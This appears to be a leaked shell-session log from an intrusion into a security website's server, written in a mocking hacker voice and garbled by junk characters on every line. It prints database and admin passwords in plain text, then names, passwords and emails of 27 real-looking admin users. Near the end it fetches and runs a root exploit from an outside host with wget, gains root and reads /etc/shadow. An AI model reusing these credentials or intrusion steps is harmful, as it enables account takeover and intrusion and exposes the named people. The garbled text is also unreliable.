drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
. X0 F) T( D# U& ^% t& N) _6 kdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
- B2 ^8 I9 k5 l. H6 K; `2 vdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql, {: q% C3 o0 J$ [7 G) m, E
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
0 b9 ]# J. ?/ J! {drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend/ n' h8 W+ _: _5 U
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
& d7 _% v: R& d) h! p/ n-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
2 @$ b4 v2 D- edrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config& h# r+ K2 A) J) O; ]* s* ?' n
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
0 W- b1 _2 B* L/ w3 Ldrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd8 M! J) J- i' z- h4 K$ B
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php9 X4 S4 L8 S) ]1 {8 ? `* z
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico# t, Z+ M' K/ }+ G1 Q
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed0 ?. ~- F' K. r4 e. W+ \
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour/ p" L6 ]1 i5 b* X. T% X \
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
! j6 ~' Z% q$ [5 _# T-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess9 b1 K, C+ m2 { j5 ?- }8 \
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
1 }3 _$ n( l& b" q-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
f# m: O9 R- w* r6 }-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
- d* W$ |0 e. D( [! k. P3 n/ r4 j-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
$ L* @) S8 F1 {) K9 G# c" I-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf8 l M0 R) z9 g$ O6 d9 s
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
9 R" [) s2 q3 J6 K' _drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
! x0 G0 o6 _4 b/ D; F# ~/ n& S2 Wdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
, c8 {" o( \3 b. I# wdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
7 @+ A9 t: Z* l7 `' i& S7 n1 @drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
$ ~3 l" U& w8 S1 K: n) K0 h" u: Kdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
# P. f, g; b: C6 X( K2 \! Sdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new, u" D9 ]- @- H! K# y. w/ ] V
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf+ r. z: d' J6 t8 D& e0 j# o% e0 v
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re# Y# R9 u; s% P& n9 V9 \( m- f7 K/ o
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
5 L$ d. p4 G0 n& ]drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
2 p* j0 D! U# `! Vdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources% j" m/ e1 K: J' @1 X
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com3 n; X5 _& s, w/ N
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
. o: D0 w! D/ G1 b& r8 R% ^drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src' |* B# Q" `( d9 @% p X
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
: Y* ~2 v! e) s- Y& B* Cdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v29 Q9 u. J# c A* K( ?- y! R6 Z
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old: d9 |& Y8 u* P B# v( {; y P2 ^
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
1 X. g) x" s( V7 U: `drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
) a0 ~ E% j, b7 C' t! F' B. T% f( G' l) N d9 o
sh-3.2$ head -20 index.php
. {) I# x5 V) b$ O6 P" c* h<?PHP" L* ^4 b2 Q( Z; g# U0 O
/**9 [( {1 q4 q6 q# h2 R3 m9 b0 M' x
* Mainfile (external) for astalavistaNET v2.0# Y5 K& m- P4 M! N/ e* `6 g) }" s
*
% H$ w6 b7 C* j. j* @copyright Astalavista IT Engineering GmbH
) E1 v9 M7 Y( h ^" F) v' A. M+ b+ S* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>6 }6 ^6 l$ K' ? x
* @version 1.0
5 M9 o9 ^7 D1 k& x' o& G# K6 Q" i. E*/
" g# Z6 _; h& j3 l) I5 I9 w2 l1 f5 `8 E) K0 E
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {7 Z* d) E3 j5 M% X0 k' T
$dontStartSession = false;
0 p2 Y, ^ F, d/ U7 |: D- I } else {9 m/ d) @- H: t o8 b/ W/ ?
$dontStartSession = true;
& {2 u. G# }: V }% l$ v7 s E' ]8 s: M' T9 v
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
* G8 g, s |* k: x6 f6 ^7 g, { require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
' g$ y6 Q5 a6 D+ B require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
% b+ \; t' P7 r, ^' L }- _; Q require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
5 c& V8 P+ h' b9 r+ X* a) D% G+ A Y6 ^
sh-3.2$ cd config
# g9 Q) P8 \" H1 Ash-3.2$ ls -la
v/ w/ Y( P1 _! H8 s& Itotal 327 f, q1 a) g6 b$ S3 S8 g" _
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .6 p* A$ F% {! S3 A
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .." p2 T& c7 e( N* @& |
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php8 S& y6 i6 L) N4 u9 t
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php5 y3 v+ u( Y' g. Z* A/ D
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php' w/ b8 {1 P; v; u! D7 j% l1 S
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
- F2 ?. Y' a4 T3 [6 K7 i' V2 G! f-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
1 {; b8 t3 F' [( X u. F( ~9 n8 u
( p+ ^$ }' n8 v5 u" c: a3 rsh-3.2$ cat com.conf.php' o4 s" y- m+ e/ u( Z6 G
[snip]
: q) i3 G0 R. K d5 b6 P' z$ c# M7 n//member-database$ _* _6 B$ g/ Y+ R Z2 @
$_CONFIG['db_mem_server'] = ‘localhost’;3 r: s7 U; Q" w% D4 v4 p4 ` {. B
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;: N5 A C- z/ r" v% a; K& e+ j' j+ l1 }
$_CONFIG['db_mem_user'] = ‘astanet_db’;( ]1 T8 J" |2 A8 A `! E$ Y
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
) ?: q, q9 f) \- n* u; G) Z$_CONFIG['db_mem_debug'] = false; //true or false! O c9 v* h- M1 _3 r
//ads-database
% l/ r9 Y0 r! j" h$ |) _5 U' d$_CONFIG['db_ads_server'] = ‘localhost’;3 q6 K A7 i5 o1 Z, C1 d4 Z5 J, S$ E
$_CONFIG['db_ads_database'] = ‘astanet_ads’;# s: T1 F, X; O+ o8 D( i& U1 ]
$_CONFIG['db_ads_user'] = ‘astanet_db’;
1 y3 E1 T) z8 i; y- \- o- M$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;3 N9 k0 b8 a0 T. x( n
$_CONFIG['db_ads_debug'] = false; //true or false+ _5 c. H5 q" B; [
//rainbow-database
1 B' W: {' J7 ~5 W0 F# \$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;) ^' X) q7 J+ x' _$ h; H8 D6 T
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
! p. k) I5 \6 {$_CONFIG['db_rainbow_user'] = ‘dinu’;
4 t! J+ [' E6 j4 w5 S! G$_CONFIG['db_rainbow_password'] = ‘dinudinu’;# c5 v: |! n" `# X' c. C$ z" w
$_CONFIG['db_rainbow_debug'] = false; //true or false
3 ~2 A( B* x5 N* O. E//mailing lists database% a' v) @& O f) c
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;2 H# j2 J! N6 e7 G% Y
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;0 @. g1 [# L/ n
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;6 y5 C; I' x- F: }
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;) D( o) l* I/ \. F: x- q6 a$ H4 A
$_CONFIG['db_mailing_lists_debug'] = false; //true or false |; \ v$ l3 U2 o: U7 V
//paypal
9 p( o/ `2 p# X$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
6 \- x* \* d% x( J+ T: N2 [5 Y$_CONFIG['sub_pp_cmd'] = ‘_xclick’;$ H1 ~6 @8 r0 ]
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
; y+ }; x! D5 N# a& i8 _1 f$_CONFIG['sub_pp_noship'] = ‘1′;
; `. _1 g. ~8 j$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;3 t" ?3 E/ e9 w i. Z! L0 U$ D
[snip]. t$ D$ n: z" _: U: X% e: f
4 Z6 T% U) p$ Gsh-3.2$ cd ..
. Y, M0 @ a2 e( Y; d3 h4 N0 Z4 ish-3.2$ cd member
E8 c3 g$ V( e0 ysh-3.2$ ls -la1 T! y+ ?" T6 E: G
total 20
/ C/ ]( D4 `3 B/ Z; o7 ~, r% `drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
/ v# @2 z# C; b. @& edrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..0 _' [2 j6 i$ U( z
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
# X" W4 _) z; P5 Y: t4 Z9 a-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
, o3 x7 w' q( j, O/ K" b9 Y T9 Ksh-3.2$ cat .htaccess
7 O. o1 B# w# S1 uSecFilterEngine off M* C7 s$ O: n7 _$ P
1 {( r# R' B6 o3 i( Z+ S4 h
sh-3.2$ cd ..
! C6 c$ E; m! N/ S2 W" E8 rsh-3.2$ cd cron: ?" c0 O% P2 @+ _3 Q) V& b
sh-3.2$ ls -la
) Q( h/ \% e, c: \" l. l9 N, ~total 168( [, S- p8 G3 A+ d8 r* Q6 E# j
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
0 e% e$ K! a# |: ?+ k2 c6 g6 Hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
+ d/ F2 l2 S; N' l9 G-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php; ^+ X2 r# N+ Y6 M6 a+ A
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php: O. d" V7 |9 k1 ^4 `) Z* u- r$ l h
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
8 @) |. e6 m+ S1 e+ G6 S9 Q8 U6 `-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
: x0 F9 U* \" M& z3 s-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
3 S6 Q8 D* M- m-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
6 g- m. Q) `2 \7 d W& O-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php& t3 }. p6 z5 R4 U9 B4 E
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php0 L- F9 r) }; y3 I- D
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh5 [! J! E4 I) k$ ]
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php8 H8 H2 o+ v+ K# a
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php1 {+ F, B' _5 ^+ X( A
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
5 l. U- V$ P( |( w-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
9 P$ ?! y3 }- q9 z! J. @% W% R-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php' q( C" }5 p) D% C9 _
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php' g* l% Q# l1 M1 e0 e
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php0 y+ h/ j4 Y- N% `! V
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php2 ?& ]8 {: O6 @4 Q0 t
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php! }. I2 e& e( v9 {
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
# ^3 f8 q8 m, Y2 {0 c: C' ~5 j2 I-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
; z# a3 f5 p; [& g' L9 O-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
4 t. H8 P8 W% J5 ?' ~
- R# j9 c0 J1 M5 ~1 r5 S9 vsh-3.2$ cd ..& G, E$ j# |2 x
sh-3.2$ cd _0072 Q" a+ J9 b Z
sh-3.2$ ls -la
8 h3 o" l) k5 T7 g0 }total 24: P. l* m7 Q+ G7 p8 v8 H8 I t
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
2 w$ O5 @) a% [$ _0 B3 Pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
# g2 i8 P! N5 k; i' [0 r-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
5 P' |3 j3 R0 I3 y8 o1 L-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
3 i- i7 }" }5 c/ s-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php' v7 P( E5 n6 r$ l% {6 Z! Z
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap; W1 i1 ?0 K( g c6 @/ O6 {
+ f! Z! y5 z4 c- K
sh-3.2$ cat .htaccess9 z3 [. k$ E4 P* P$ n1 C9 B
authType Basic* S' w& ^( N7 t6 w& r
authName Admin
* S4 `+ Q4 j9 q1 FauthUserFile /home/astanet/auth/.htadm_pwd
* g+ W0 P4 P9 R" m* irequire valid-user
+ e$ D/ H$ h! N0 o* x U
- Z. g. R6 c/ v5 Rsh-3.2$ cat /home/astanet/auth/.htadm_pwd# h; {' S# z6 G2 E; i2 u0 m
admin2net:CR0bl65MwhfT
) X5 O' U7 [! n( R7 r
9 x# p$ l, o) B: s; j+ I* j+ K8 Xsh-3.2$ mysql -u astanet_db -p
" A7 ?2 M7 L, X5 ~Enter password:
2 a! M9 Z7 ]* ~ e' Z. P& {Welcome to the MySQL monitor. Commands end with ; or \g.0 `' @6 v# j% x- x, F! Q
Your MySQL connection id is 275153
7 @; N( c; b1 z7 u8 ~Server version: 5.0.45-community-log MySQL Community Edition (GPL)2 g; ?) Y( j/ ~& }4 C5 b i. V) J
( T" y1 p( B6 m( Z, E+ X
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; P/ u+ c0 p$ F' D5 _- }# M% I
, |% u$ ~7 a- K! Z. v( ]mysql> show databases;
" f9 k" X0 j9 m! Q) j2 `) T6 `7 y+———————–+6 V4 { B" j/ S$ O. K" G1 u
| Database |6 S7 B( D @! h% G0 s( U
+———————–+
4 }/ P7 y) P% ^. H| information_schema |
3 W9 W. q4 W! q0 ]+ E. x| astanet_ads |
- F" g% Z" q: U| astanet_mailing_lists |
" D0 J) L+ p9 B| astanet_mediawiki |
) p+ U, D9 t0 Q| astanet_membersystem |* m: u$ p2 R L- d5 J
| test |
: P# J; z% d8 L: a, I# ^+———————–+
5 Q+ U T( f* C' ]( B! l6 rows in set (0.00 sec)' s0 H) [7 i% |* E
0 L1 R9 c4 l1 B. f
mysql> use astanet_membersystem
7 P5 u' s4 B n: z1 u9 ^Database changed
% V* J! E' S. v" \6 Z, \mysql> show tables;
. w4 a5 [. `7 n; U+———————————–+% p; [6 G1 n* G# s* h9 J2 S( d
| Tables_in_astanet_membersystem |; Q2 {0 c( f" i7 T2 ], l
+———————————–+
7 O8 D2 g# k0 B4 ^% R2 O| blacklist_categories |% u' ^" K" ]/ s
| blacklist_content |
8 C7 i( m2 A) j# ?| blacklist_levels |5 i' Z( `# v( \3 i& ^' D
| blacklist_mcset |3 Y# N! s" c+ t2 T) K8 w
| dir_categories |1 h% l6 A. r e( d( z6 }
| dir_comments |
5 A( i& N2 P" L- ?0 |+ F/ Q$ C| dir_links |/ V, D5 U" \9 p/ Z- b6 E
| dir_temp |/ i& b, A0 e* s5 z# \
| dir_votes |( `- Y1 ~( M( s* E, O5 K3 _( e/ ~
| documents |% W9 X% z* z+ `1 H
| documents_categories |
9 ?' m: ~6 ?( X; i| email_content |
/ j+ H& y- V' Q- o" p' U| email_settings |
2 i9 W4 Z. k. s+ y" g. G| exploits |' Q/ M( e2 s! |+ ^! Z
| exploits_categories |# c$ h& u0 _; V% p- @" C" P
| exploittree_categories |
, T% b' t% F- F/ ]: L| exploittree_exploits |
9 S# ]3 K& q( h0 r* P0 l) Y| home_values |; Y0 ^8 W6 h& o# h9 f4 r* y9 I
| iso_countries |6 o0 @ J5 m f! h
| links_categories |; V% X1 v8 U, f0 S& M4 e# w) U
| links_records |5 N _- `8 S: `2 Q$ ^+ N+ h* S
| links_unauth |
( ~, L& ~2 f7 r* J3 ~' K7 D1 J/ i| links_votes |
3 [% ~) [0 W+ u/ Q8 j+ _| log |
. p, I- N4 P$ M- w# a| news_categories |1 W! p! {0 B2 q+ i4 Y
| news_comments |% m5 f& s2 }7 W7 b- H
| news_emoticons |% Z7 g( U9 k, k+ N- V, E r: [
| news_latest |$ t) W3 ~% c7 v9 [) d
| news_messages |
' ?0 w; \$ a4 l5 Z| news_statistics |
4 \/ u7 ]' ^& a0 g! E8 e| news_votes |' k7 _ A$ }; y; q, b
| prices_content |3 \# p% v) q, ?' d: z) K
| prices_offers |
( a6 Y& {5 T9 {% x/ m' X/ \| rss_settings |7 {( s# [9 ~! u7 H" h! A
| sessions |, N' s6 H6 k9 D2 L
| stats_signups |' [% e5 c5 s* s8 T- ]
| u2u2 |
5 X* x9 V) ^0 B' I; f| u2u_contact |
8 I' T' z; v: P; \" @| u2u_settings |
4 A) u6 `3 X) \, Q3 t# x" ^| user_keywords_selected_categories |
& j: G+ T/ {. M3 S2 f4 ?7 j| users |
, R' S: F: N" v& R0 f% B! q| users_ipn_test |) H( O) d) L" i- J
| users_keyword_values |4 N* R+ a* G9 G4 ?6 N6 ?9 B
| users_profile |
- `4 y1 L% ~' ?7 P| users_temp |
0 ^" p9 N" G/ |% P* M| users_upgrade |# \- f [- S- w& ?: y
+———————————–+
3 X# H* A2 {0 w! V' V1 c S46 rows in set (0.00 sec)! p6 l0 K, c+ p; w! l$ h& x$ g0 J
% Q1 s6 Q' l% ~4 U: D: q1 i
mysql> describe users;" w5 W/ f+ v9 Z+ _- {4 t! e4 s
+————————–+————————————–+——+—–+———————+—————-+
+ O: s! |5 z% y/ ~, B| Field | Type | Null | Key | Default | Extra |
5 f7 ^2 o* f" W& E* W# t+————————–+————————————–+——+—–+———————+—————-+
. L$ h# T0 G) i; h/ Q; W| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment | n5 J K6 c" t
| user | varchar(50) | NO | | | |
5 O" [7 M; V, O6 \- s* W, ]| nickname | varchar(30) | NO | MUL | anonymous | |
% A4 Z, X. }& Y1 P) }4 P: j| password | varchar(30) | NO | | | |
6 w" P D4 d% G6 _9 P. K| userlevel | tinyint(3) | YES | MUL | NULL | |
$ h$ o: X9 U+ r! G4 E8 a- r' z| exp | int(8) unsigned | NO | | 0 | |
+ J& E. J9 v+ G' s' ^, Y| email | varchar(50) | NO | | | |, L4 v8 ^- B- H4 t
| ip | varchar(15) | NO | | 0 | |3 ~0 f3 I% o. p, o% V' t5 n
| proxy | set(’0′,’1′) | NO | | 0 | |
+ C% ^: m6 u9 F- F| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |: f! q- ?* W. I6 {& s7 S1 j
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |' e, y; ]2 Z; d4 c; W
| anz_in | tinyint(1) | NO | | -1 | |
5 ]7 j( J2 u: i4 n% @4 N+ O| status | tinyint(1) unsigned | NO | | 0 | |, \+ V' ~+ B. G3 v) o; O
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
( S4 T9 p ?3 v+ {| freemember | set(’0′,’1′) | NO | | 0 | |
o% J, [7 I9 u8 v2 m| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
; C' o; n' k$ q% g' F3 l! V| lang | tinytext | NO | | | |
3 w( E R2 q; u6 N' ?0 D/ k& l$ a| adid | smallint(6) | NO | | 0 | |; l/ D1 @) a* s* z
| pp_txn_id | varchar(255) | YES | | NULL | |+ u1 \/ ^( S! I' ~( f
| cnb_transaction_id | varchar(255) | YES | | NULL | |
- {2 M9 i R9 j( v6 t5 W| cnb_order_id | varchar(255) | YES | | NULL | | e3 Z4 @9 c, V* g0 X
| cnb_user_id | int(11) | YES | | 0 | |
! i7 t) a# F( D5 w! v+————————–+————————————–+——+—–+———————+—————-+
# I9 Z. h5 k) B( c# X/ j- g3 R22 rows in set (0.01 sec)/ v% C' B, F: u& `+ G7 g: y$ V
: P- ?3 B3 r* f" l @' I
mysql> select count(*) as skids from users;' |5 q4 N5 |7 |' m1 M
+——-+
, {9 ~1 v1 N# }! z; P1 u3 E7 _| skids |, p0 S Y/ Q5 y! @* s
+——-+
: g+ ]9 B+ h7 Q. P" P| 25199 |/ w' m u+ _; L% O5 e' H
+——-+$ o& j* ?, K8 q2 w; y) L. x
1 row in set (0.00 sec)! K `# A P/ d% v0 [
. G# \/ O$ {/ h% P' X' Lmysql> select user,nickname,password,email from users where userlevel = 1;/ p/ U0 T# W% g5 k
+————————–+———————-+——————+———————————–+
- H& G. j6 n9 D4 O2 Q: D6 b| user | nickname | password | email |
5 Q! D5 X8 l! ^; a# N+————————–+———————-+——————+———————————–+
; G2 @6 p$ \( b% G| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
. R4 }* z, O6 u3 M! g; D| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
. o! w1 s3 w8 u$ P$ i) V| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
3 D/ D1 X6 w' P- M| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
+ e2 I% ]) u! ^) U| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |/ K9 ^* Y& ]9 F2 a
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
2 g6 U) ^5 J5 }5 N| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
' g9 N' Q# ~ c. B8 o| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
" r' }0 L3 d7 i( J3 s9 b8 [| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
' t# u" ?) n, k9 [' A. O| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |( `# N2 n8 K: j, I1 x9 u- V
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
) L8 k* w5 I- m2 E6 F0 r| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |+ k. f, D! Z4 `: Y) P! n
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
+ B6 O7 X0 h' v& {5 N% e9 b| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |, Y- g, d9 F+ e6 G
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
: E' m- c) f1 L7 p0 K| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
& H* c9 D1 H% P1 L0 n' s. c0 @- c| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |7 f' d1 J O0 e. O5 Y
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
6 @- g0 }- ?, L( R1 Y| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
% C( M& ~& \! B( A* R| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |8 q$ A3 u- i5 @0 z4 R
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
y; h4 o9 c% J4 r1 T5 G5 ?& M| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
7 v/ x5 P o; C$ [| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |0 v2 U$ l: Q" `6 D9 Y- p
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
; {# L4 g( |$ R3 }% z0 ^, E' {| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
8 F) s# ?2 F0 Y7 [9 y2 y| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
0 l& Q3 W' N3 c6 X E6 s| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |' O2 f: U r/ J9 w6 H
+————————–+———————-+——————+———————————–+
, C, K0 w4 |. ?! M. p27 rows in set (0.00 sec)) q# h, K6 P# S. x0 l, Y
/ M9 i; ^' J8 tmysql> exit;
6 n3 i" B) Z1 R: g+ o6 G T# NBye
+ b: W* \' c, a5 ^
$ M8 C* ^( ]& Z- F J& h[~] plaintext passwords? yes,
0 l6 @+ _' S! L1 Z4 ]& D8 EThose so called “security professionals” who charge you $6.66 / month to/ U7 ?( R/ N( g' ^5 l9 ?- g
register at their hack-proof portal, save your passwords in plaintext…' B$ x" [) w# C" o
brilliant!
, e+ T# {* N8 C4 F: Q
) @0 x6 \* A# j* g. O$ J[~] This been fun but we want more.( {' O6 q& C( V. H+ X# K& I7 Z6 H
- P& r& e& Z) Q) s# Y3 v
sh-3.2$ uname -a. }. y$ j1 k* G" d' x" G
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" I, B9 e. W% g q' H6 h) j& f1 ssh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]1 [5 y. k- X3 p+ o! r
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
- J. y! t* T: U" Q# @! M2 ^Resolving anti.sec.labs… 13.33.33.37
' {& y- z ]# Y* R. p& R' R* eConnecting to anti.sec.labs|13.33.33.37|:80… connected.
: m6 x/ ], x e- J; r( BHTTP request sent, awaiting response… 200 OK
1 J2 z+ q4 D6 X9 B9 x* MLength: 18200 (18K) [text/plain]% s* M! W/ x6 ^% h* {9 L
Saving to: `g0troot’$ t# _# ^+ a1 X5 a# F/ E8 N1 t
5 ~6 \) v2 h& h4 y100%[=========================================================================================================================================>] 18,200 58.6K/s in1 u2 G( d4 a: j" w% B. h
0.3s9 U# W5 k' `4 u7 P3 j
: z% Z9 x% y4 Y4 W& A- Y) u( O
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]; R: V6 c% R9 o( }6 D
, D8 u4 b1 Y2 D. w# ], Psh-3.2$ ./g0troot -i x86_642 s) Z6 G; }8 E% E6 o. O
[+] g0troot - anti.sec.labs
3 p# p" v' {2 E/ }1 k[+] Target: 2.6.18-128.1.10.el5. U: |. _7 H1 |
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
' r: V; D* o; [$ i/ z0 e6 [6 e$ y. A% n% [3 z! R9 o6 J% J/ ?
[+] r00tr00t9 a! ]! K+ N7 Y, n
[~] Executing shell…
, R4 `$ Z* Y2 I+ Q. K& K' u/ k( K e3 ]5 R
sh-3.2# id
; T: p2 h ]4 [4 kuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
0 F5 E; d8 G! D" I
% a; V! r7 T& n" t+ esh-3.2# cat /etc/shadow
3 [8 ]- p0 N: a" n/ Q" L! @root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::! ?; p6 }/ C& p- r
[snip]& A) O" n* j, ]! }+ E
